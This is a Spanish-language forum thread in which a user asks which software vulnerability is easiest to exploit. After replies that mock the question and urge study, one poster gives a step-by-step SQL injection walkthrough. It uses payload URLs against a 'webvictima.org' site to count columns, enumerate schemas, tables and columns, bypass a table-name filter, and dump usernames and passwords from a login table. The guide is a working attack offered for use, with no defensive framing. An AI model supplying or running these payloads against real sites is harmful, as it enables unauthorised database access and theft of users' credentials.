Quien me dice que vulnerabilbidad es mas facil de usar y cual es la mas dificil ?. Si tienes un manual sobre vulnerabilidades me ayudaria.
Quien me dice que vulnerabilbidad es mas facil de usar y cual es la mas dificil ?. Si tienes un manual sobre vulnerabilidades me ayudaria.
La vulnerabilidad más fácil de usar es la vulnerabilidad de la que más información posees... puesto que si no la conoces será jodida .
Resumiendo, haz el favor de hacer preguntas coherentes. Por cierto:
¿Por qué hay muchos que dirigiéndose al foro (mucha gente) dice cosas como "tienes" que va dirigido a una persona en concreto?Iniciado por chico1988
Un saludo.
www.rae.es <-- Empieza por este manual
chico1988 documentate mas sobre todo en concreto ,servicios y demas antes de preguntar. Explotar una vulnerabilidad no es algo nada facil sin unos conocimientos medios. Yo no tengo ni idea de como se hace y me manejo en este mundillo bastante.
PD: Mi post 666 The Number Of The Beast ^_____^
post 666 y escrito a las 0:00 uhhhh xDD
The daemons are no longer just in my mind xDDDDIniciado por boycot007
Salu2
Keep on Rollin'
Última edición por chico1988; 07-11-2006 a las 21:49
En mi opinion las vulnerabilidades de sql son bastantes sencillas te dejo una guia :
primero debes probar si la web es vulnerable a nuestra injection para esto :
a la web se le agrega ' al final y quedara asi :
http://www.webvictima.org/article.php?id=10253'
si dice q hay un error en la base de datos sql ... quiere decir q es vulnerable
despues tenemos que fijarnos el numero de columnas para esto se ordenan de la siguiente forma :
http://www.webvictima.org/article.php?id=-10253 order by 1/*
y se va cambiando el numero hasta q diga :
Unknown column 'el numero q probaste' in 'order clause'
http://www.webvictima.org/article.php?id=-10253 order by 10/* no tira error
http://www.webvictima.org/article.php?id=-10253 order by 15/* aca te dice :
Unknown column '15' in 'order clause'
esto significa que la pagina tiene 14 columnas !
ahora necesitamos encontrar la columna "vulnerable" y escribis esto:
http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
vas a ver dos numeros en la web, hay uno que esta remarcado o aparece arriba, esa es la columna que buscabamos, suponganse que la columna era la numero 2 quedaria asi ...
http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14 --
despues para ver la info de la base de datos necesitas escribir :
http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(schema_name),3,4,5,6,7,8, 9,10,11,12,13,14 from information_schema.schemata
ahora para averiguar como se llama la tabla donde se guardan los "logins" :
http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 ,10,11,12,13,14 from information_schema.tables where table_schema=database()--
en este caso se llamaba "login" xD :
http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8, 9,10,11,12,13,14 from information_schema.columns where table_name=login
si esa te da un error, no te preocupes intenta con esto :
http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8, 9,10,11,12,13,14 from information_schema.columns where table_name=char(108,111,103,105,110)
y ahi esta
ahora necesitas id,user,pass,user_id y password y la injection quedaria asi :
http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3 ,4,5,6,7,8,9,10,11,12,13,14 from login
z1dr0ff.- | HACKERS BROTHERS
esa es una injection entre tantas que hay
Marcadores